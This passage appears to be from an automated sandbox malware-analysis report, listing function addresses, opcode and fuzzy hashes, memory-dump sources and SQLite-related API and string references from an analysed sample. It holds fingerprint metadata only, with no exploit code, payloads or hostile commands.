                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1c7a7970970b9619.Ifc350ae509dc2b53.
                                                                                      • String ID:
                                                                                      • API String ID: 1339256467-0
                                                                                      • Opcode ID: 4b2bec5c5b67afc30128fc52d08776a1456c258050c1ce80521c144b3b22ca30
                                                                                      • Instruction ID: 6cd9176f993bc9deb636652e7e62c2b560a749a3932fd728a017b568e687e9b2
                                                                                      • Opcode Fuzzy Hash: 4b2bec5c5b67afc30128fc52d08776a1456c258050c1ce80521c144b3b22ca30
                                                                                      • Instruction Fuzzy Hash: 1602AE71A483418FC714DF28D480A5ABBE2BFC9308F144E2DE8A597B51D731E94ACF92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4DE490 Relevance: .4, Instructions: 446COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8b8e7e07431e1c5ad3a4ff7be2e597aa6546ab723db3c3e616048f8eef001524
                                                                                      • Instruction ID: b76ac263f9e1e7ac191c3e6acb96e0c9f29cb5fbf5b03e7b35c81e1bbfc240f0
                                                                                      • Opcode Fuzzy Hash: 8b8e7e07431e1c5ad3a4ff7be2e597aa6546ab723db3c3e616048f8eef001524
                                                                                      • Instruction Fuzzy Hash: CEE19D62A096504FD71ADA38C4F1FA6FBD1DB92324F0A47BDD9960BBC3D0189904C7E2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06C361CC Relevance: .4, Instructions: 385COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3371371911.0000000006C32000.00000002.00000001.01000000.00000007.sdmp, Offset: 06C30000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3371346471.0000000006C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c30000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: df36eace7630e7f63d0ae6110dbc664933ebcbe850838420fb95f50c3b443c88
                                                                                      • Instruction ID: 536a8e5c7dfb20d396c281799f9db1b5eeb14755aa034b2c10fb94c55606fcf3
                                                                                      • Opcode Fuzzy Hash: df36eace7630e7f63d0ae6110dbc664933ebcbe850838420fb95f50c3b443c88
                                                                                      • Instruction Fuzzy Hash: 53E159A244E3D15FCB634B799CB56A17FB0EE2721471E08CBC4C18F0A3E119665BD722
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C440D30 Relevance: .4, Instructions: 384COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ac2633e839e7cc703aa33f86885529c70e5212143448e967a0cd2ec6dfa572c8
                                                                                      • Instruction ID: 58051be6263293ff3becfeb0f071cf3a51fc7eec089405e6d9ae44e090d86377
                                                                                      • Opcode Fuzzy Hash: ac2633e839e7cc703aa33f86885529c70e5212143448e967a0cd2ec6dfa572c8
                                                                                      • Instruction Fuzzy Hash: F3E18F70E0425A8FEB04CFA8C490EDDFBB2EF55319F348269D854A7B85D770A956CB80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C413CE0 Relevance: .3, Instructions: 346COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 85a5308eb9ee1b52c1b2a151a9421058c2041b8fdd7f9a338012da56db25a0e3
                                                                                      • Instruction ID: e16642faad30b881de7b7e0f5bd2741d2193b64d2d539e6ffc796b8d98c30614
                                                                                      • Opcode Fuzzy Hash: 85a5308eb9ee1b52c1b2a151a9421058c2041b8fdd7f9a338012da56db25a0e3
                                                                                      • Instruction Fuzzy Hash: F4D1D4B160C2914FC315CF38D450BEAFBE4AF59209F0806AEE5D987B42D320E618CB96
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3F0F40 Relevance: .3, Instructions: 327COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ab423e4a2db129936148fe99f5000639cabd0e372760371f5720a1ea0f717365
                                                                                      • Instruction ID: c71adf6a08be48daadcc3c78b8ec1cd373df94f975ec92cee66ef7e900e09794
                                                                                      • Opcode Fuzzy Hash: ab423e4a2db129936148fe99f5000639cabd0e372760371f5720a1ea0f717365
                                                                                      • Instruction Fuzzy Hash: DDA16EB3A2618A4FE708897C98923ED7771EF2A314F140E2DD4B2DBB81D115C947DB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C430E60 Relevance: .3, Instructions: 325COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4a597203c0e293d91ce576c60423bdaaef88d02e424c1394d1f2791da9c73194
                                                                                      • Instruction ID: 24df1d0ac3c89443671f2536b40417dac311864f1352f225e927e62647751303
                                                                                      • Opcode Fuzzy Hash: 4a597203c0e293d91ce576c60423bdaaef88d02e424c1394d1f2791da9c73194
                                                                                      • Instruction Fuzzy Hash: BDC15771A093518FD304CF1AC480A5AFBF1AFC9319F189A6DE8898B751D336E846CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3DAF2E Relevance: .3, Instructions: 294COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2cb920d13927231c3ee0ed4d89fc5086414849f9d50d61fe49a802b2edcccd29
                                                                                      • Instruction ID: ae9f06318d4d10d191d8446f66e3f18cf88a387072f4318dce6379fd07d1bab9
                                                                                      • Opcode Fuzzy Hash: 2cb920d13927231c3ee0ed4d89fc5086414849f9d50d61fe49a802b2edcccd29
                                                                                      • Instruction Fuzzy Hash: 45B1E021E2AF404DDB63AA398471336BA6CAFBB2D5F53D71BFC6674D12EB2185834140
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C42BC70 Relevance: .2, Instructions: 242COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c2b04870070d1e1341cdfd5e20a04e6a856b05038d8ba5c242b5567db6418086
                                                                                      • Instruction ID: 64a8b60b9e7005f3e866266df50b98470f85f744c5e36969c30a80da59f0ab02
                                                                                      • Opcode Fuzzy Hash: c2b04870070d1e1341cdfd5e20a04e6a856b05038d8ba5c242b5567db6418086
                                                                                      • Instruction Fuzzy Hash: E2817A70A083018BD704CF19C886E5AB7E1FFC9319F14896DE99A97B01D739E946CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C430AA0 Relevance: .2, Instructions: 195COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1a385e73ad6ed131e344b9cc7947732c55dcdc063e8b76cb28cb4ffcbb43e977
                                                                                      • Instruction ID: 1f24606d9d3d7de04712c71df81adc782a1d2dbf39b50c24638d5af3d01530d8
                                                                                      • Opcode Fuzzy Hash: 1a385e73ad6ed131e344b9cc7947732c55dcdc063e8b76cb28cb4ffcbb43e977
                                                                                      • Instruction Fuzzy Hash: 53613E716082518FC748CF1AC880E1AB7E6BFC8319F189A6DE899CB755E734E805CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C42C670 Relevance: .2, Instructions: 181COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1e1bd39475495f5bb5e6c7b4a975d0c0920363ffe7f3b044853a5c4ce8eff8a9
                                                                                      • Instruction ID: 591ac28a200ffeae77d8c917decfe63c479b6edd91401061d54b1fa3043d410b
                                                                                      • Opcode Fuzzy Hash: 1e1bd39475495f5bb5e6c7b4a975d0c0920363ffe7f3b044853a5c4ce8eff8a9
                                                                                      • Instruction Fuzzy Hash: E6517F72F001199FEB08DFAAC881EAEBBF6AF88315F158169E915E7300D734D9418BD0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3F0000 Relevance: .1, Instructions: 95COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b452ce2da6b98656da2a44582ae637b327acf6aa30dbc4b610fae097b901dde4
                                                                                      • Instruction ID: e87cd9e90f9a0cabe064a18232148ebf2a9d996c27e77f332f6a711903bfddef
                                                                                      • Opcode Fuzzy Hash: b452ce2da6b98656da2a44582ae637b327acf6aa30dbc4b610fae097b901dde4
                                                                                      • Instruction Fuzzy Hash: 57310C55E1A6988BCB008939CD917D6BFC1C756319F28D7F8D8188FBCED624E409C390
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0108CB78 Relevance: .0, Instructions: 46COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3363455380.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1080000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f333821c481225752e03c8fb50a01b726d8f2d282875c409c1336cd9cc08256a
                                                                                      • Instruction ID: 3fa6450c9025423c1b10d37e98c4acbe916293a555e02beb1b41a5eefe4903cf
                                                                                      • Opcode Fuzzy Hash: f333821c481225752e03c8fb50a01b726d8f2d282875c409c1336cd9cc08256a
                                                                                      • Instruction Fuzzy Hash: CA11DBB2E12A068BE71CEF7BE940449BFFBEBC8200715D17A95088B629FB3455128B40
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C432250 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 210COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C436930: SI1c7a7970970b9619.SQLITE.INTEROP(INSERT INTO %Q.'%q_content' VALUES(%s),00000000,?,6C4FF2F8,?,?,00000000), ref: 6C436ACA
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C43229B
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(?,00000001,?,?,?,<"Cl,00000002,00000000,00000000,?,?,?,6C43223C,?,?,?), ref: 6C4322BA
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C4322CE
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(?,00000002,-000003FF,?,?,?,00000400,00000000,?,<"Cl,00000002,00000000,00000000,?), ref: 6C4322E6
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?,?,00000002,-000003FF,?,?,?,00000400,00000000,?,<"Cl,00000002,00000000,00000000,?), ref: 6C4322EC
                                                                                        • Part of subcall function 6C4B57B0: SI950480ab972e108d.SQLITE.INTEROP(00000015,API called with NULL prepared statement,?,00000000,00000000,?,6C47D2D6,?,?,?,00000000,00000000,?), ref: 6C4B57CC
                                                                                        • Part of subcall function 6C4B57B0: SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00014D90,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,00000000,00000000,?,6C47D2D6,?,?,?,00000000,00000000,?), ref: 6C4B580C
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?,?,?,?,?,?,00000400,00000000,?,<"Cl,00000002,00000000,00000000,?), ref: 6C432346
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(?,00000001,?,?,?,?,?,?,?,?,?,?,00000400,00000000,?,<"Cl), ref: 6C4323BE
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?,?,00000001,?,?,?,?,?,?,?,?,?,?,00000400,00000000,?), ref: 6C4323C4
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(?,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4323DD
                                                                                      • SIbff6307869d58daf.SQLITE.INTEROP(?,00000000,?,00000001,00000000), ref: 6C4323E6
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(?,00000002,00000000,?,?,00000000,?,00000001,00000000), ref: 6C4323F1
                                                                                      • SIbff6307869d58daf.SQLITE.INTEROP(?,00000001,?,00000002,00000000,?,?,00000000,?,00000001,00000000), ref: 6C4323F9
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(?,00000003,00000000,?,?,00000001,?,00000002,00000000,?,?,00000000,?,00000001,00000000), ref: 6C432404
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?), ref: 6C43240D
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?), ref: 6C432427
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(?,00000001,?,?), ref: 6C43244F
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?,?,00000001,?,?), ref: 6C432455
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I46481015c7f49c68.$I9c6d7cd7b7d38055.$I950480ab972e108d.Ibff6307869d58daf.Unothrow_t@std@@@__ehfuncinfo$??2@$I1c7a7970970b9619.
                                                                                      • String ID: <"Cl
                                                                                      • API String ID: 1099447345-1059076926
                                                                                      • Opcode ID: cff0b39757364207374352be284f914fea58e285d66aa135fb80875d9e65edf9
                                                                                      • Instruction ID: ee5c7de766185fc89156ee777a133db44e99ba3606bac44b47ced02f32733614
                                                                                      • Opcode Fuzzy Hash: cff0b39757364207374352be284f914fea58e285d66aa135fb80875d9e65edf9
                                                                                      • Instruction Fuzzy Hash: ED51F7B6A012116BE711DA269C45FDF72A99FC975CF04442CF80CA6742FB31EA0986F2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C47CCC0 Relevance: 28.4, APIs: 7, Strings: 9, Instructions: 440COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(not authorized,?,?,?,?,?,?,?,?,?,?,6C47CC89,?,?), ref: 6C47CD17
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(%s.%s,?,6C5057D4,?), ref: 6C47CD78
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,?,00000000,?,?,?,?), ref: 6C47CD96
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(error during initialization: %s,?,?,?,?,?,?,?,?), ref: 6C47CFCF
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,?,?,?,?,?,?,?), ref: 6C47CFDD
                                                                                      • ___swprintf_l.LIBCMT ref: 6C47D1C9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1c7a7970970b9619.$Ifc350ae509dc2b53.$___swprintf_l
                                                                                      • String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_$sqlite3_extension_init$unable to open shared library [%.*s]
                                                                                      • API String ID: 4033629167-3733955532
                                                                                      • Opcode ID: 35757d6c03766042728dc88028bb9991ee1e285b2348fdd2a1dce8211b20a8bf
                                                                                      • Instruction ID: fe2a32028807c455fdf450bd906888f8989711a36c26dd35019744fd69361015
                                                                                      • Opcode Fuzzy Hash: 35757d6c03766042728dc88028bb9991ee1e285b2348fdd2a1dce8211b20a8bf
                                                                                      • Instruction Fuzzy Hash: 21E101716042019BD720DF68DC44F9ABBF9EF89319F14062DE8A8D7B00E735D556CBA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4229B0 Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 180COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C4DCC30: SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC41
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000299B9,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,00000000,?), ref: 6C422A02
                                                                                      • SIdba35b6dcb77d463.SQLITE.INTEROP(?,BEGIN,00000000,00000000,00000000,?,00000000,?), ref: 6C422A1D
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(00000000,?,?,?,?,?,00000000,?), ref: 6C422AB6
                                                                                        • Part of subcall function 6C4B57B0: SI950480ab972e108d.SQLITE.INTEROP(00000015,API called with NULL prepared statement,?,00000000,00000000,?,6C47D2D6,?,?,?,00000000,00000000,?), ref: 6C4B57CC
                                                                                        • Part of subcall function 6C4B57B0: SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00014D90,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,00000000,00000000,?,6C47D2D6,?,?,?,00000000,00000000,?), ref: 6C4B580C
                                                                                      • SI4983499b64278231.SQLITE.INTEROP(00000000,00000001,?,?,?,?,?,?,00000000,?), ref: 6C422AC6
                                                                                      • SIdba35b6dcb77d463.SQLITE.INTEROP(?,END,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 6C422B68
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.$Idba35b6dcb77d463.$I4983499b64278231.I9c6d7cd7b7d38055.
                                                                                      • String ID: %s at line %d of [%.10s]$BEGIN$END$SELECT * FROM %Q.%Q$SELECT * FROM %Q.'%q_rowid'$Schema corrupt or not an rtree$_parent$_rowid$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 908525542-2211310616
                                                                                      • Opcode ID: e2cbd5b211c7b6dc264a2e56aef05470119ea88d1cb2aa50f4dc51fc828ab19a
                                                                                      • Instruction ID: 1daaa726533a6c147c2c39529de31fa0339b17f8708c293ed59b5774db04e506
                                                                                      • Opcode Fuzzy Hash: e2cbd5b211c7b6dc264a2e56aef05470119ea88d1cb2aa50f4dc51fc828ab19a
                                                                                      • Instruction Fuzzy Hash: 9A51C2B1E10219ABDF24DFA8DC46FEF7BB9AB44219F000529F809F6B41EB75990486D1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C41EF80 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 281COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
